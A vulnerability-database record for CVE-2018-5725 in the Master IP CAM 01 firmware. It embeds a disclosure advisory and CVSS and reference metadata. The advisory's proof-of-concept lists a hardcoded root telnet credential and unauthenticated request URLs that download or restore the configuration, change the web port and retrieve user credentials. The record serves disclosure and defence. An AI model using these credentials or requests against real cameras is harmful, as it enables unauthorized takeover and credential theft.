var-201801-1648
Vulnerability from variot

MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. The MASTER IPCAMERA01 device contains an access control vulnerability. Information may be tampered with. MASTER IPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTER IPCAMERA01 3.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration.

Exploit Title: Master IP CAM 01 Multiple Vulnerabilities

Date: 17-01-2018

Remote: Yes

Exploit Authors: Daniele Linguaglossa, Raffaele Sabato

Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89

Vendor: Master IP CAM

Version: 3.3.4.2103

CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726

I DESCRIPTION

The Master IP CAM 01 suffers from multiple vulnerabilities:

[CVE-2018-5723] Hardcoded Password for Root Account

[CVE-2018-5724] Unauthenticated Configuration Download and Upload

[CVE-2018-5725] Unauthenticated Configuration Change

[CVE-2018-5726] Unauthenticated Sensitive Information Disclosure

II PROOF OF CONCEPT

[CVE-2018-5723] Hardcoded Password for Root Account

It is possible to access telnet with the hardcoded credential root:cat1029

[CVE-2018-5724] Unauthenticated Configuration Download and Upload

Download:

http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi

Upload Form:

Unauthenticated Configuration Upload

[CVE-2018-5725] Unauthenticated Configuration Change

Change configuration:

http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080

List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

[CVE-2018-5726] Unauthenticated Sensitive Information Disclosure

Retrieve sensitive information:

http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser

III REFERENCES

http://syrion.me/blog/master-ipcam/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726

http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf



{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "master ip camera01",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "barni",
        "version": "3.3.4.2103"
      },
      {
        "_id": null,
        "model": "master ipcamera01",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "barni carlo",
        "version": "3.3.4.2103"
      },
      {
        "_id": null,
        "model": "ipcamera01",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "master",
        "version": "3.3.4.2103"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5725"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:barni:master_ip_camera01_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Daniele Linguaglossa, Raffaele Sabato",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145935"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2018-5725",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2018-5725",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2018-02193",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-135757",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2018-5725",
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-5725",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-5725",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-02193",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201801-570",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-135757",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-5725",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5725"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. MASTER IPCAMERA01 The device contains an access control vulnerability.Information may be tampered with. MASTERIPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities\n# Date: 17-01-2018\n# Remote: Yes\n# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato\n# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89\n# Vendor: Master IP CAM\n# Version: 3.3.4.2103\n# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726\n \nI DESCRIPTION\n========================================================================\nThe Master IP CAM 01 suffers of multiple vulnerabilities:\n \n# [CVE-2018-5723] Hardcoded Password for Root Account\n# [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n# [CVE-2018-5725] Unauthenticated Configuration Change\n# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \n \nII PROOF OF CONCEPT\n========================================================================\n \n## [CVE-2018-5723] Hardcoded Password for Root Account\n \nIs possible to access telnet with the hardcoded credential root:cat1029\n \n \n## [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n \nDownload:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/backup.cgi\n \nUpload Form:\n \n### Unauthenticated Configuration Upload\n\u003cform name=\"form6\" method=\"post\" enctype=\"multipart/form-data\"\naction=\"cgi-bin/hi3510/restore.cgi\" \u003e\n\u003cinput type=\"file\" name=\"setting_file\" \u003e\n\u003cinput type=\"submit\" value=\"restore\" \u003e\n\u003c/form\u003e\n \n \n## [CVE-2018-5725] Unauthenticated Configuration Change\n \nChange configuration:\n 
\nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080\n \nList of available commands here:\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n \n \n## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \nRetrieve sensitive information:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser\n \n \nIII REFERENCES\n========================================================================\nhttp://syrion.me/blog/master-ipcam/\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-5725"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725"
      },
      {
        "db": "PACKETSTORM",
        "id": "145935"
      }
    ],
    "trust": 2.43
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-135757",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43693",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-5725",
        "trust": 3.3
      },
      {
        "db": "PACKETSTORM",
        "id": "145935",
        "trust": 1.9
      },
      {
        "db": "EXPLOIT-DB",
        "id": "43693",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      },
      {
        "db": "PACKETSTORM",
        "id": "145935"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5725"
      }
    ]
  },
  "id": "VAR-201801-1648",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:53:28.264000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.barni.it/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-284",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5725"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 3.3,
        "url": "http://syrion.me/blog/master-ipcam/"
      },
      {
        "trust": 1.9,
        "url": "https://www.exploit-db.com/exploits/43693/"
      },
      {
        "trust": 1.8,
        "url": "https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5725"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/798.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5726"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/syrion89"
      },
      {
        "trust": 0.1,
        "url": "http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5724"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5723"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/dzonerzy,"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      },
      {
        "db": "PACKETSTORM",
        "id": "145935"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5725"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02193",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-135757",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5725",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145935",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5725",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2018-01-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-02193",
        "ident": null
      },
      {
        "date": "2018-01-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-135757",
        "ident": null
      },
      {
        "date": "2018-01-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-5725",
        "ident": null
      },
      {
        "date": "2018-02-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-001498",
        "ident": null
      },
      {
        "date": "2018-01-17T03:33:33",
        "db": "PACKETSTORM",
        "id": "145935",
        "ident": null
      },
      {
        "date": "2018-01-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201801-570",
        "ident": null
      },
      {
        "date": "2018-01-16T22:29:00.397000",
        "db": "NVD",
        "id": "CVE-2018-5725",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2018-01-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-02193",
        "ident": null
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-135757",
        "ident": null
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-5725",
        "ident": null
      },
      {
        "date": "2018-02-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-001498",
        "ident": null
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201801-570",
        "ident": null
      },
      {
        "date": "2024-11-21T04:09:15.260000",
        "db": "NVD",
        "id": "CVE-2018-5725",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "MASTER IPCAMERA01 Device access control vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001498"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-570"
      }
    ],
    "trust": 0.6
  }
}

